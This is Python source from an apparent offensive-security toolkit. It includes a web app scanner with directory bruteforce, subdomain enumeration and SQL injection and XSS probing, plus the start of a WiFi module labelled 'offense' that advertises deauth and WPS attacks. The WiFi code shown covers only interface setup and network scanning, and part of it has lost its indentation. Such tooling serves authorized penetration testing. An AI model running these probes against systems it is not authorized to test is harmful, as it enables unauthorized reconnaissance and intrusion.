    'supplied argument is not a valid MySQL', 'unterminated quoted string',
]
# ── Scanner Service ───────────────────────────────────────────────────────────
class WebAppScanner:
    """Web application vulnerability scanner.

    Offers quick reconnaissance (headers, technology fingerprint, SSL),
    threaded directory bruteforce, subdomain enumeration (crt.sh + DNS),
    basic reflected SQLi/XSS probing, and a same-origin crawler.
    Long-running scans execute in daemon threads and are tracked in
    ``_active_jobs``; poll them with :meth:`get_job_status`.
    """

    def __init__(self):
        # Results are persisted under <data>/webapp_scanner/results.
        self._data_dir = os.path.join(get_data_dir(), 'webapp_scanner')
        self._results_dir = os.path.join(self._data_dir, 'results')
        os.makedirs(self._results_dir, exist_ok=True)
        self._active_jobs: Dict[str, dict] = {}  # job_id -> progress holder
        self._session = None  # lazily created shared requests.Session

    def _get_session(self):
        """Return the shared HTTP session, creating it on first use.

        Raises:
            RuntimeError: if the requests library is not installed.
        """
        if not _HAS_REQUESTS:
            raise RuntimeError('requests library required')
        if not self._session:
            self._session = requests.Session()
            self._session.headers.update({
                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) '
                              'AppleWebKit/537.36 (KHTML, like Gecko) '
                              'Chrome/120.0.0.0 Safari/537.36',
            })
            # Scan targets often have broken/self-signed certificates.
            self._session.verify = False
            # verify=False otherwise makes urllib3 emit an
            # InsecureRequestWarning per request, flooding scan output.
            try:
                requests.packages.urllib3.disable_warnings()
            except Exception:
                pass
        return self._session

    # ── Quick Scan ────────────────────────────────────────────────────────
    def quick_scan(self, url: str) -> dict:
        """Run a quick scan — headers, tech fingerprint, basic checks.

        Returns a dict with status code, raw headers, security-header
        ratings, detected technologies, the redirect chain and (for
        HTTPS targets) an SSL/TLS summary.  Network failures are
        reported under the 'error' key rather than raised.
        """
        if not _HAS_REQUESTS:
            return {'ok': False, 'error': 'requests library required'}
        url = self._normalize_url(url)
        results = {
            'url': url,
            'scan_time': datetime.now(timezone.utc).isoformat(),
            'headers': {},
            'security_headers': {},
            'technologies': [],
            'server': '',
            'status_code': 0,
            'redirects': [],
            'ssl': {},
        }
        try:
            sess = self._get_session()
            resp = sess.get(url, timeout=10, allow_redirects=True)
            results['status_code'] = resp.status_code
            results['headers'] = dict(resp.headers)
            results['server'] = resp.headers.get('Server', '')
            # Record the redirect chain that led to the final response.
            for r in resp.history:
                results['redirects'].append({
                    'url': r.url,
                    'status': r.status_code,
                })
            results['security_headers'] = self._check_security_headers(resp.headers)
            results['technologies'] = self._fingerprint_tech(resp)
            parsed = urlparse(url)
            if parsed.scheme == 'https':
                results['ssl'] = self._check_ssl(parsed.hostname, parsed.port or 443)
        except Exception as e:
            results['error'] = str(e)
        return results

    # ── Directory Bruteforce ──────────────────────────────────────────────
    def dir_bruteforce(self, url: str, wordlist: List[str] = None,
                       extensions: List[str] = None,
                       threads: int = 10, timeout: float = 5.0) -> dict:
        """Start an asynchronous directory bruteforce.

        Args:
            url: Target base URL.
            wordlist: Paths to try (defaults to DIR_WORDLIST_SMALL).
            extensions: Suffixes appended to each word ('' = none).
            threads: Maximum concurrent request threads per batch.
            timeout: Per-request timeout in seconds.

        Returns:
            ``{'ok': True, 'job_id': ...}``; poll with get_job_status().
        """
        if not _HAS_REQUESTS:
            return {'ok': False, 'error': 'requests library required'}
        url = self._normalize_url(url).rstrip('/')
        if not wordlist:
            wordlist = DIR_WORDLIST_SMALL
        if not extensions:
            extensions = ['']
        job_id = f'dirbust_{int(time.time())}'
        holder = {'done': False, 'found': [], 'tested': 0,
                  'total': len(wordlist) * len(extensions)}
        self._active_jobs[job_id] = holder

        def do_scan():
            sess = self._get_session()
            # Guards both the found list and the tested counter; a bare
            # holder['tested'] += 1 from many threads can lose updates.
            lock = threading.Lock()

            def test_path(path):
                for ext in extensions:
                    full_path = f'{path}{ext}' if ext else path
                    test_url = f'{url}/{full_path}'
                    try:
                        r = sess.get(test_url, timeout=timeout,
                                     allow_redirects=False)
                        with lock:
                            holder['tested'] += 1
                            # 404/403/500 are treated as "nothing there".
                            if r.status_code not in (404, 403, 500):
                                holder['found'].append({
                                    'path': '/' + full_path,
                                    'status': r.status_code,
                                    'size': len(r.content),
                                    'content_type': r.headers.get('Content-Type', ''),
                                })
                    except Exception:
                        with lock:
                            holder['tested'] += 1

            # Launch request threads in batches of `threads` to bound
            # concurrency without a full pool implementation.
            batch = []
            for word in wordlist:
                t = threading.Thread(target=test_path, args=(word,), daemon=True)
                batch.append(t)
                t.start()
                if len(batch) >= threads:
                    for t in batch:
                        t.join(timeout=timeout + 5)
                    batch.clear()
            for t in batch:
                t.join(timeout=timeout + 5)
            holder['done'] = True

        threading.Thread(target=do_scan, daemon=True).start()
        return {'ok': True, 'job_id': job_id}

    # ── Subdomain Enumeration ─────────────────────────────────────────────
    def subdomain_enum(self, domain: str, wordlist: List[str] = None,
                       use_ct: bool = True) -> dict:
        """Enumerate subdomains via Certificate Transparency logs and DNS.

        Args:
            domain: Apex domain, e.g. 'example.com'.
            wordlist: Candidate labels for the DNS bruteforce
                (a built-in common list is used when omitted).
            use_ct: Also query crt.sh for certificates issued under
                the domain.
        """
        found = set()
        # Certificate Transparency logs (crt.sh JSON endpoint).
        if use_ct and _HAS_REQUESTS:
            try:
                resp = requests.get(
                    f'https://crt.sh/?q=%.{domain}&output=json',
                    timeout=15)
                if resp.status_code == 200:
                    for entry in resp.json():
                        name = entry.get('name_value', '')
                        for sub in name.split('\n'):
                            sub = sub.strip().lower()
                            # Skip wildcard certificate entries such as
                            # '*.example.com' — not resolvable hostnames.
                            if '*' in sub:
                                continue
                            if sub.endswith('.' + domain):
                                found.add(sub)
            except Exception:
                pass
        # DNS bruteforce over common labels.
        if not wordlist:
            wordlist = ['www', 'mail', 'ftp', 'admin', 'api', 'dev',
                        'staging', 'test', 'blog', 'shop', 'app', 'cdn',
                        'ns1', 'ns2', 'mx', 'smtp', 'imap', 'pop',
                        'vpn', 'remote', 'portal', 'webmail', 'secure',
                        'beta', 'demo', 'docs', 'git', 'jenkins', 'ci',
                        'grafana', 'kibana', 'prometheus', 'monitor',
                        'status', 'support', 'help', 'forum', 'wiki',
                        'internal', 'intranet', 'proxy', 'gateway']
        for sub in wordlist:
            fqdn = f'{sub}.{domain}'
            try:
                socket.getaddrinfo(fqdn, None)
                found.add(fqdn)
            except socket.gaierror:
                pass
        return {'ok': True, 'domain': domain, 'subdomains': sorted(found),
                'count': len(found)}

    # ── Vulnerability Scanning ────────────────────────────────────────────
    def vuln_scan(self, url: str, scan_sqli: bool = True,
                  scan_xss: bool = True) -> dict:
        """Scan for SQL injection and reflected XSS vulnerabilities.

        Fetches the page, extracts same-origin URLs that carry query
        parameters, and probes each parameter with a limited payload set.
        """
        if not _HAS_REQUESTS:
            return {'ok': False, 'error': 'requests library required'}
        url = self._normalize_url(url)
        findings = []
        sess = self._get_session()
        try:
            resp = sess.get(url, timeout=10)
            body = resp.text
        except Exception as e:
            return {'ok': False, 'error': str(e)}
        param_urls = self._extract_param_urls(body, url)
        # Cap the number of probed URLs to avoid hammering the target.
        for test_url in param_urls[:20]:
            parsed = urlparse(test_url)
            params = dict(p.split('=', 1) for p in parsed.query.split('&')
                          if '=' in p) if parsed.query else {}
            for param_name, param_val in params.items():
                if scan_sqli:
                    findings.extend(self._test_sqli(sess, test_url, param_name, param_val))
                if scan_xss:
                    findings.extend(self._test_xss(sess, test_url, param_name, param_val))
        return {
            'ok': True,
            'url': url,
            'findings': findings,
            'urls_tested': len(param_urls[:20]),
        }

    def _test_sqli(self, sess, url: str, param: str, original_val: str) -> List[dict]:
        """Probe one query parameter for error-based SQL injection."""
        findings = []
        parsed = urlparse(url)
        base_params = dict(p.split('=', 1) for p in parsed.query.split('&')
                           if '=' in p) if parsed.query else {}
        for payload in SQLI_PAYLOADS[:6]:  # limit payloads per parameter
            test_params = base_params.copy()
            test_params[param] = original_val + payload
            try:
                test_url = f'{parsed.scheme}://{parsed.netloc}{parsed.path}'
                r = sess.get(test_url, params=test_params, timeout=5)
                body = r.text.lower()
                for error_sig in SQL_ERRORS:
                    if error_sig.lower() in body:
                        findings.append({
                            'type': 'sqli',
                            'severity': 'high',
                            'url': url,
                            'parameter': param,
                            'payload': payload,
                            'evidence': error_sig,
                            'description': f'SQL injection (error-based) in parameter "{param}"',
                        })
                        return findings  # one finding per param is enough
            except Exception:
                continue
        return findings

    def _test_xss(self, sess, url: str, param: str, original_val: str) -> List[dict]:
        """Probe one query parameter for reflected XSS (payload echoed back)."""
        findings = []
        parsed = urlparse(url)
        base_params = dict(p.split('=', 1) for p in parsed.query.split('&')
                           if '=' in p) if parsed.query else {}
        for payload in XSS_PAYLOADS[:4]:  # limit payloads per parameter
            test_params = base_params.copy()
            test_params[param] = payload
            try:
                test_url = f'{parsed.scheme}://{parsed.netloc}{parsed.path}'
                r = sess.get(test_url, params=test_params, timeout=5)
                # Unmodified reflection of the payload suggests no encoding.
                if payload in r.text:
                    findings.append({
                        'type': 'xss',
                        'severity': 'high',
                        'url': url,
                        'parameter': param,
                        'payload': payload,
                        'description': f'Reflected XSS in parameter "{param}"',
                    })
                    return findings
            except Exception:
                continue
        return findings

    def _extract_param_urls(self, html: str, base_url: str) -> List[str]:
        """Extract same-origin URLs carrying query parameters from HTML."""
        urls = set()
        # href/src/action attribute values containing a '?'.
        for match in re.finditer(r'(?:href|src|action)=["\']([^"\']+\?[^"\']+)["\']', html):
            u = match.group(1)
            full = urljoin(base_url, u)
            if urlparse(full).netloc == urlparse(base_url).netloc:
                urls.add(full)
        return list(urls)

    # ── Security Headers ──────────────────────────────────────────────────
    def _check_security_headers(self, headers) -> dict:
        """Rate each header in SECURITY_HEADERS as good/weak/missing."""
        results = {}
        for h in SECURITY_HEADERS:
            value = headers.get(h, '')
            results[h] = {
                'present': bool(value),
                'value': value,
                'rating': 'good' if value else 'missing',
            }
        # CSP allowing inline/eval script largely defeats its purpose.
        csp = headers.get('Content-Security-Policy', '')
        if csp:
            if "'unsafe-inline'" in csp or "'unsafe-eval'" in csp:
                results['Content-Security-Policy']['rating'] = 'weak'
        # HSTS max-age below one year is considered weak.
        hsts = headers.get('Strict-Transport-Security', '')
        if hsts:
            if 'max-age' in hsts:
                try:
                    age = int(re.search(r'max-age=(\d+)', hsts).group(1))
                    if age < 31536000:
                        results['Strict-Transport-Security']['rating'] = 'weak'
                except Exception:
                    pass
        return results

    # ── Technology Fingerprinting ─────────────────────────────────────────
    def _fingerprint_tech(self, resp) -> List[str]:
        """Identify technologies from response headers, body and cookies."""
        techs = []
        headers_str = '\n'.join(f'{k}: {v}' for k, v in resp.headers.items())
        body = resp.text[:50000]  # only check the first 50KB
        cookies_str = ' '.join(resp.cookies.keys()) if resp.cookies else ''
        for tech, sigs in TECH_SIGNATURES.items():
            found = False
            for h_sig in sigs['headers']:
                if h_sig.lower() in headers_str.lower():
                    found = True
                    break
            if not found:
                for b_sig in sigs['body']:
                    if b_sig.lower() in body.lower():
                        found = True
                        break
            if not found:
                for c_sig in sigs['cookies']:
                    if c_sig.lower() in cookies_str.lower():
                        found = True
                        break
            if found:
                techs.append(tech)
        return techs

    # ── SSL/TLS Audit ─────────────────────────────────────────────────────
    def _check_ssl(self, hostname: str, port: int = 443) -> dict:
        """Check SSL/TLS configuration of hostname:port.

        Pass 1 connects without verification to learn the negotiated
        protocol/cipher even on broken setups; pass 2 uses a verifying
        context to judge certificate validity.
        """
        result = {
            'valid': False,
            'issuer': '',
            'subject': '',
            'expires': '',
            'protocol': '',
            'cipher': '',
            'issues': [],
        }
        try:
            ctx = ssl.create_default_context()
            ctx.check_hostname = False
            ctx.verify_mode = ssl.CERT_NONE
            with ctx.wrap_socket(socket.socket(), server_hostname=hostname) as s:
                s.settimeout(5)
                s.connect((hostname, port))
                result['protocol'] = s.version()
                result['cipher'] = s.cipher()[0] if s.cipher() else ''
            # Second pass with default (verifying) context.
            ctx2 = ssl.create_default_context()
            try:
                with ctx2.wrap_socket(socket.socket(), server_hostname=hostname) as s2:
                    s2.settimeout(5)
                    s2.connect((hostname, port))
                    cert = s2.getpeercert()
                    result['valid'] = True
                    result['issuer'] = dict(x[0] for x in cert.get('issuer', []))
                    result['subject'] = dict(x[0] for x in cert.get('subject', []))
                    result['expires'] = cert.get('notAfter', '')
            except ssl.SSLCertVerificationError as e:
                result['issues'].append(f'Certificate validation failed: {e}')
            if result['protocol'] in ('TLSv1', 'TLSv1.1', 'SSLv3'):
                result['issues'].append(f'Weak protocol: {result["protocol"]}')
        except Exception as e:
            result['error'] = str(e)
        return result

    # ── Crawler ───────────────────────────────────────────────────────────
    def crawl(self, url: str, max_pages: int = 50, depth: int = 3) -> dict:
        """Spider a website (same origin only) and build a sitemap.

        Args:
            url: Starting URL.
            max_pages: Hard cap on pages fetched.
            depth: Maximum link depth from the start page.
        """
        if not _HAS_REQUESTS:
            return {'ok': False, 'error': 'requests library required'}
        url = self._normalize_url(url)
        base_domain = urlparse(url).netloc
        visited: Set[str] = set()
        queued: Set[str] = {url}  # prevents unbounded duplicate enqueueing
        pages = []
        queue = [(url, 0)]
        sess = self._get_session()
        while queue and len(visited) < max_pages:
            current_url, current_depth = queue.pop(0)
            if current_url in visited or current_depth > depth:
                continue
            visited.add(current_url)
            try:
                r = sess.get(current_url, timeout=5, allow_redirects=True)
                page = {
                    'url': current_url,
                    'status': r.status_code,
                    'content_type': r.headers.get('Content-Type', ''),
                    'size': len(r.content),
                    'title': '',
                    'forms': 0,
                    'links_out': 0,
                }
                title_match = re.search(r'<title[^>]*>([^<]+)</title>', r.text, re.I)
                if title_match:
                    page['title'] = title_match.group(1).strip()
                page['forms'] = len(re.findall(r'<form', r.text, re.I))
                # Queue same-origin links; count off-origin ones.
                links = re.findall(r'href=["\']([^"\']+)["\']', r.text)
                outlinks = 0
                for link in links:
                    full_link = urljoin(current_url, link)
                    parsed = urlparse(full_link)
                    if parsed.netloc == base_domain:
                        clean = f'{parsed.scheme}://{parsed.netloc}{parsed.path}'
                        if clean not in visited and clean not in queued:
                            queued.add(clean)
                            queue.append((clean, current_depth + 1))
                    else:
                        outlinks += 1
                page['links_out'] = outlinks
                pages.append(page)
            except Exception:
                continue
        return {
            'ok': True,
            'url': url,
            'pages_crawled': len(pages),
            'pages': pages,
        }

    # ── Job Management ────────────────────────────────────────────────────
    def get_job_status(self, job_id: str) -> dict:
        """Return progress for a background job; finished jobs are removed."""
        holder = self._active_jobs.get(job_id)
        if not holder:
            return {'ok': False, 'error': 'Job not found'}
        result = {
            'ok': True,
            'done': holder['done'],
            'tested': holder['tested'],
            'total': holder['total'],
            'found': holder['found'],
        }
        if holder['done']:
            # Final poll: drop the bookkeeping entry.
            self._active_jobs.pop(job_id, None)
        return result

    # ── Helpers ───────────────────────────────────────────────────────────
    @staticmethod
    def _normalize_url(url: str) -> str:
        """Trim whitespace and default to https:// when no scheme is given."""
        url = url.strip()
        if not url.startswith(('http://', 'https://')):
            url = 'https://' + url
        return url
# ── Singleton ─────────────────────────────────────────────────────────────────
_instance = None
_lock = threading.Lock()
def get_webapp_scanner() -> WebAppScanner:
    """Return the process-wide WebAppScanner, creating it once (thread-safe)."""
    global _instance
    if _instance is not None:
        return _instance
    with _lock:
        # Double-checked: another thread may have built it while we waited.
        if _instance is None:
            _instance = WebAppScanner()
    return _instance
# ── CLI ───────────────────────────────────────────────────────────────────────
def _ws_quick_scan(svc):
    """Menu option 1: quick scan (headers + tech + SSL summary)."""
    url = input(" URL: ").strip()
    if not url:
        return
    print(" Scanning...")
    r = svc.quick_scan(url)
    print(f"\n Status: {r.get('status_code')}")
    print(f" Server: {r.get('server', 'unknown')}")
    if r.get('technologies'):
        print(f" Technologies: {', '.join(r['technologies'])}")
    if r.get('security_headers'):
        print(" Security Headers:")
        for h, info in r['security_headers'].items():
            mark = '\033[92m✓\033[0m' if info['present'] else '\033[91m✗\033[0m'
            print(f" {mark} {h}")
    if r.get('ssl'):
        ssl_info = r['ssl']
        print(f" SSL: {'Valid' if ssl_info.get('valid') else 'INVALID'} "
              f"({ssl_info.get('protocol', '?')})")
        for issue in ssl_info.get('issues', []):
            print(f" [!] {issue}")


def _ws_dir_bruteforce(svc):
    """Menu option 2: directory bruteforce with live progress polling."""
    url = input(" URL: ").strip()
    if not url:
        return
    print(" Starting directory bruteforce...")
    r = svc.dir_bruteforce(url)
    if r.get('job_id'):
        while True:
            time.sleep(2)
            s = svc.get_job_status(r['job_id'])
            print(f" [{s['tested']}/{s['total']}] Found: {len(s['found'])}", end='\r')
            if s['done']:
                print()
                for item in s['found']:
                    print(f" [{item['status']}] {item['path']} ({item['size']} bytes)")
                break


def _ws_subdomains(svc):
    """Menu option 3: subdomain enumeration (crt.sh + DNS)."""
    domain = input(" Domain: ").strip()
    if not domain:
        return
    print(" Enumerating subdomains...")
    r = svc.subdomain_enum(domain)
    print(f"\n Found {r['count']} subdomains:")
    for sub in r.get('subdomains', []):
        print(f" {sub}")


def _ws_vuln_scan(svc):
    """Menu option 4: SQLi/XSS probe on discovered parameters."""
    url = input(" URL: ").strip()
    if not url:
        return
    print(" Scanning for vulnerabilities...")
    r = svc.vuln_scan(url)
    if r.get('findings'):
        print(f"\n Found {len(r['findings'])} potential vulnerabilities:")
        for f in r['findings']:
            print(f" [{f['severity'].upper()}] {f['type'].upper()}: {f['description']}")
            print(f" Parameter: {f.get('parameter', '?')}, Payload: {f.get('payload', '?')}")
    else:
        print(" No vulnerabilities found in tested parameters.")


def _ws_crawl(svc):
    """Menu option 5: crawl/spider the target site."""
    url = input(" URL: ").strip()
    if not url:
        return
    raw = input(" Max pages (default 50): ").strip()
    try:
        max_pages = int(raw) if raw else 50
    except ValueError:
        # Non-numeric input previously raised and crashed the menu loop.
        max_pages = 50
    print(" Crawling...")
    r = svc.crawl(url, max_pages=max_pages)
    print(f"\n Crawled {r.get('pages_crawled', 0)} pages:")
    for page in r.get('pages', []):
        print(f" [{page['status']}] {page['url']}"
              f" ({page['size']} bytes, {page['forms']} forms)")


def run():
    """Interactive CLI for Web Application Scanner."""
    svc = get_webapp_scanner()
    # Menu choice -> handler; each handler takes the scanner service.
    handlers = {
        '1': _ws_quick_scan,
        '2': _ws_dir_bruteforce,
        '3': _ws_subdomains,
        '4': _ws_vuln_scan,
        '5': _ws_crawl,
    }
    while True:
        print("\n╔═══════════════════════════════════════╗")
        print("║      WEB APPLICATION SCANNER          ║")
        print("╠═══════════════════════════════════════╣")
        print("║  1 — Quick Scan (headers + tech)      ║")
        print("║  2 — Directory Bruteforce             ║")
        print("║  3 — Subdomain Enumeration            ║")
        print("║  4 — Vulnerability Scan (SQLi/XSS)    ║")
        print("║  5 — Crawl / Spider                   ║")
        print("║  0 — Back                             ║")
        print("╚═══════════════════════════════════════╝")
        choice = input("\n Select: ").strip()
        if choice == '0':
            break
        handler = handlers.get(choice)
        if handler:
            handler(svc)
843
modules/wifi_audit.py Normal file
View File

@@ -0,0 +1,843 @@
"""AUTARCH WiFi Auditing
Interface management, network discovery, handshake capture, deauth attack,
rogue AP detection, WPS attack, and packet capture for wireless security auditing.
"""
DESCRIPTION = "WiFi network auditing & attack tools"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "offense"
import os
import re
import json
import time
import signal
import shutil
import threading
import subprocess
from pathlib import Path
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Any, Tuple
# Prefer the project's path helpers; fall back to stdlib equivalents so the
# module still imports when run outside the AUTARCH tree.
try:
    from core.paths import find_tool, get_data_dir
except ImportError:
    def find_tool(name):
        """Locate an executable on PATH (stdlib fallback for core.paths)."""
        return shutil.which(name)
    def get_data_dir():
        """Return the default data directory next to the package root."""
        return str(Path(__file__).parent.parent / 'data')
# ── Data Structures ──────────────────────────────────────────────────────────
@dataclass
class AccessPoint:
    """A wireless access point observed during an airodump-ng scan."""
    bssid: str                   # AP MAC address
    ssid: str = ""               # network name (may be empty for hidden SSIDs)
    channel: int = 0             # radio channel
    encryption: str = ""         # privacy field from airodump CSV (e.g. WPA2)
    cipher: str = ""             # cipher field from airodump CSV
    auth: str = ""               # authentication field from airodump CSV
    signal: int = 0              # power level as reported by airodump-ng
    beacons: int = 0             # beacon frames counted
    data_frames: int = 0         # data frames counted
    clients: List[str] = field(default_factory=list)  # associated client MACs
@dataclass
class WifiClient:
    """A wireless station (client) observed during an airodump-ng scan."""
    mac: str                     # client MAC address
    bssid: str = ""              # BSSID of the AP it is associated with
    signal: int = 0              # power level as reported by airodump-ng
    frames: int = 0              # frame count from the CSV 'packets' column
    probe: str = ""              # probed SSID(s), if any
# ── WiFi Auditor ─────────────────────────────────────────────────────────────
class WiFiAuditor:
"""WiFi auditing toolkit using aircrack-ng suite."""
    def __init__(self):
        """Initialise data directories, locate external tools, reset state."""
        self.data_dir = os.path.join(get_data_dir(), 'wifi')
        os.makedirs(self.data_dir, exist_ok=True)
        self.captures_dir = os.path.join(self.data_dir, 'captures')
        os.makedirs(self.captures_dir, exist_ok=True)
        # Tool paths — each is an absolute path or None when not installed.
        # find_tool may be the project helper or the shutil.which fallback;
        # shutil.which is used as a second chance either way.
        self.airmon = find_tool('airmon-ng') or shutil.which('airmon-ng')
        self.airodump = find_tool('airodump-ng') or shutil.which('airodump-ng')
        self.aireplay = find_tool('aireplay-ng') or shutil.which('aireplay-ng')
        self.aircrack = find_tool('aircrack-ng') or shutil.which('aircrack-ng')
        self.reaver = find_tool('reaver') or shutil.which('reaver')
        self.wash = find_tool('wash') or shutil.which('wash')
        self.iwconfig = shutil.which('iwconfig')
        self.iw = shutil.which('iw')
        self.ip_cmd = shutil.which('ip')
        # State
        self.monitor_interface: Optional[str] = None   # set by enable_monitor()
        self.scan_results: Dict[str, AccessPoint] = {} # BSSID -> AccessPoint
        self.clients: List[WifiClient] = []            # stations from last scan
        self.known_aps: List[Dict] = []
        self._scan_proc: Optional[subprocess.Popen] = None
        self._capture_proc: Optional[subprocess.Popen] = None
        self._jobs: Dict[str, Dict] = {}               # job_id -> async job state
def get_tools_status(self) -> Dict[str, bool]:
"""Check availability of all required tools."""
return {
'airmon-ng': self.airmon is not None,
'airodump-ng': self.airodump is not None,
'aireplay-ng': self.aireplay is not None,
'aircrack-ng': self.aircrack is not None,
'reaver': self.reaver is not None,
'wash': self.wash is not None,
'iwconfig': self.iwconfig is not None,
'iw': self.iw is not None,
'ip': self.ip_cmd is not None,
}
# ── Interface Management ─────────────────────────────────────────────
    def get_interfaces(self) -> List[Dict]:
        """List wireless interfaces.

        Tries three discovery methods in order: `iw dev` (preferred),
        `iwconfig` output parsing, and finally /sys/class/net entries
        with a wireless/phy80211 subdirectory.  Each entry is a dict
        with 'name', 'mode', 'channel' and 'mac' keys; unknown values
        default to 'managed'/'unknown', 0 and ''.
        """
        interfaces = []
        # Try iw first
        if self.iw:
            try:
                out = subprocess.check_output([self.iw, 'dev'], text=True, timeout=5)
                iface = None
                for line in out.splitlines():
                    line = line.strip()
                    if line.startswith('Interface'):
                        # New interface stanza begins; previous one (if any)
                        # keeps being filled until... NOTE(review): only the
                        # last stanza is appended below — earlier interfaces
                        # appear dropped when several exist; verify intent.
                        iface = {'name': line.split()[-1], 'mode': 'managed', 'channel': 0, 'mac': ''}
                    elif iface:
                        if line.startswith('type'):
                            iface['mode'] = line.split()[-1]
                        elif line.startswith('channel'):
                            try:
                                iface['channel'] = int(line.split()[1])
                            except (ValueError, IndexError):
                                pass
                        elif line.startswith('addr'):
                            iface['mac'] = line.split()[-1]
                if iface:
                    interfaces.append(iface)
            except Exception:
                pass
        # Fallback to iwconfig
        if not interfaces and self.iwconfig:
            try:
                out = subprocess.check_output([self.iwconfig], text=True,
                                              stderr=subprocess.DEVNULL, timeout=5)
                # iwconfig separates interfaces with blank lines.
                for block in out.split('\n\n'):
                    if 'IEEE 802.11' in block or 'ESSID' in block:
                        name = block.split()[0]
                        mode = 'managed'
                        if 'Mode:Monitor' in block:
                            mode = 'monitor'
                        elif 'Mode:Master' in block:
                            mode = 'master'
                        freq_m = re.search(r'Channel[:\s]*(\d+)', block)
                        ch = int(freq_m.group(1)) if freq_m else 0
                        interfaces.append({'name': name, 'mode': mode, 'channel': ch, 'mac': ''})
            except Exception:
                pass
        # Fallback: list from /sys
        if not interfaces:
            try:
                wireless_dir = Path('/sys/class/net')
                if wireless_dir.exists():
                    for d in wireless_dir.iterdir():
                        # Wireless NICs expose a 'wireless' or 'phy80211' dir.
                        if (d / 'wireless').exists() or (d / 'phy80211').exists():
                            interfaces.append({
                                'name': d.name, 'mode': 'unknown', 'channel': 0, 'mac': ''
                            })
            except Exception:
                pass
        return interfaces
    def enable_monitor(self, interface: str) -> Dict:
        """Put interface into monitor mode via airmon-ng.

        Runs `airmon-ng check kill` first (stops interfering services),
        then `airmon-ng start <iface>` and parses the created monitor
        interface name from its output.  On success, records the name in
        self.monitor_interface.

        Returns:
            {'ok': True, 'interface': ..., 'message': ...} or
            {'ok': False, 'error': ...}.
        """
        if not self.airmon:
            return {'ok': False, 'error': 'airmon-ng not found'}
        try:
            # Kill interfering processes
            subprocess.run([self.airmon, 'check', 'kill'],
                           capture_output=True, text=True, timeout=10)
            # Enable monitor mode
            result = subprocess.run([self.airmon, 'start', interface],
                                    capture_output=True, text=True, timeout=10)
            # Detect monitor interface name (usually wlan0mon or similar);
            # airmon-ng output format varies between versions, so try two
            # known patterns before falling back to "<iface>mon".
            mon_iface = interface + 'mon'
            for line in result.stdout.splitlines():
                m = re.search(r'\(monitor mode.*enabled.*on\s+(\S+)\)', line, re.I)
                if m:
                    mon_iface = m.group(1)
                    break
                m = re.search(r'monitor mode.*vif.*enabled.*for.*\[(\S+)\]', line, re.I)
                if m:
                    mon_iface = m.group(1)
                    break
            self.monitor_interface = mon_iface
            return {'ok': True, 'interface': mon_iface, 'message': f'Monitor mode enabled on {mon_iface}'}
        except subprocess.TimeoutExpired:
            return {'ok': False, 'error': 'Timeout enabling monitor mode'}
        except Exception as e:
            return {'ok': False, 'error': str(e)}
def disable_monitor(self, interface: str = None) -> Dict:
"""Disable monitor mode and restore managed mode."""
if not self.airmon:
return {'ok': False, 'error': 'airmon-ng not found'}
iface = interface or self.monitor_interface
if not iface:
return {'ok': False, 'error': 'No monitor interface specified'}
try:
result = subprocess.run([self.airmon, 'stop', iface],
capture_output=True, text=True, timeout=10)
self.monitor_interface = None
# Restart network manager
subprocess.run(['systemctl', 'start', 'NetworkManager'],
capture_output=True, timeout=5)
return {'ok': True, 'message': f'Monitor mode disabled on {iface}'}
except Exception as e:
return {'ok': False, 'error': str(e)}
def set_channel(self, interface: str, channel: int) -> Dict:
"""Set wireless interface channel."""
if self.iw:
try:
subprocess.run([self.iw, 'dev', interface, 'set', 'channel', str(channel)],
capture_output=True, text=True, timeout=5)
return {'ok': True, 'channel': channel}
except Exception as e:
return {'ok': False, 'error': str(e)}
return {'ok': False, 'error': 'iw not found'}
# ── Network Scanning ─────────────────────────────────────────────────
    def scan_networks(self, interface: str = None, duration: int = 15) -> Dict:
        """Scan for nearby wireless networks using airodump-ng.

        Blocks for `duration` seconds while airodump-ng writes CSV output,
        then stops it with SIGINT and parses the results into
        self.scan_results / self.clients.

        Args:
            interface: Monitor-mode interface; defaults to the one set by
                enable_monitor().
            duration: Capture time in seconds.
        """
        iface = interface or self.monitor_interface
        if not iface:
            return {'ok': False, 'error': 'No monitor interface. Enable monitor mode first.'}
        if not self.airodump:
            return {'ok': False, 'error': 'airodump-ng not found'}
        # airodump-ng appends '-01' and an extension to this prefix.
        prefix = os.path.join(self.captures_dir, f'scan_{int(time.time())}')
        try:
            proc = subprocess.Popen(
                [self.airodump, '--output-format', 'csv', '-w', prefix, iface],
                stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL
            )
            time.sleep(duration)
            # SIGINT lets airodump-ng flush and close its output files.
            proc.send_signal(signal.SIGINT)
            proc.wait(timeout=5)
            # Parse CSV output
            csv_file = prefix + '-01.csv'
            if os.path.exists(csv_file):
                self._parse_airodump_csv(csv_file)
                return {
                    'ok': True,
                    'access_points': [self._ap_to_dict(ap) for ap in self.scan_results.values()],
                    'clients': [self._client_to_dict(c) for c in self.clients],
                    'count': len(self.scan_results)
                }
            return {'ok': False, 'error': 'No scan output produced'}
        except Exception as e:
            return {'ok': False, 'error': str(e)}
    def _parse_airodump_csv(self, filepath: str):
        """Parse airodump-ng CSV output into scan_results and clients.

        The CSV has two sections: access points first, then a station
        table introduced by a 'Station MAC' header row.  Rows are
        recognised by a leading MAC address; malformed numeric fields
        default to 0.  Any parse failure silently leaves whatever was
        collected so far (best-effort).
        """
        self.scan_results.clear()
        self.clients.clear()
        try:
            with open(filepath, 'r', errors='ignore') as f:
                content = f.read()
            # Split into AP section and client section
            sections = content.split('Station MAC')
            ap_section = sections[0] if sections else ''
            client_section = sections[1] if len(sections) > 1 else ''
            # Parse APs
            for line in ap_section.splitlines():
                parts = [p.strip() for p in line.split(',')]
                # Data rows start with a MAC address (header rows don't).
                if len(parts) >= 14 and re.match(r'^[0-9A-Fa-f]{2}:', parts[0]):
                    bssid = parts[0].upper()
                    ap = AccessPoint(
                        bssid=bssid,
                        channel=int(parts[3]) if parts[3].strip().isdigit() else 0,
                        signal=int(parts[8]) if parts[8].strip().lstrip('-').isdigit() else 0,
                        encryption=parts[5].strip(),
                        cipher=parts[6].strip(),
                        auth=parts[7].strip(),
                        beacons=int(parts[9]) if parts[9].strip().isdigit() else 0,
                        data_frames=int(parts[10]) if parts[10].strip().isdigit() else 0,
                        ssid=parts[13].strip() if len(parts) > 13 else ''
                    )
                    self.scan_results[bssid] = ap
            # Parse clients
            for line in client_section.splitlines():
                parts = [p.strip() for p in line.split(',')]
                if len(parts) >= 6 and re.match(r'^[0-9A-Fa-f]{2}:', parts[0]):
                    client = WifiClient(
